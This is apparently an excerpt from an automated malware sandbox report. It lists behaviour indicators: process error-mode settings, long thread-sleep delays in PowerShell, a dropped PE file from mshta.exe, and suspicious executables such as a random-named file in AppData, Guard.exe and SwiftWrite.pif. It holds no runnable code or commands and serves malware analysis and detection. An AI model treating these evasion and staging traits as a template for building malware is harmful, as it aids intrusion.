Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2117Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1252Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1116Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 446Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3785Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6004Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4701
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2618
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3280
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5333
Source: C:\Windows\System32\mshta.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\baochuan1[1]Jump to dropped file
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeAPI coverage: 3.7 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6480Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1476Thread sleep count: 1116 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1436Thread sleep count: 446 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5968Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 1276Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6484Thread sleep time: -17524406870024063s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8088Thread sleep count: 4701 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8172Thread sleep time: -22136092888451448s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8184Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8072Thread sleep count: 2618 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8064Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7184Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7300Thread sleep count: 3280 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7308Thread sleep count: 5333 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8084Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7756Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Users\user\AppData\Roaming\rMpqCJnPv.exeCode function: 15_2_00007FF7BB85C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,15_2_00007FF7BB85C7C0
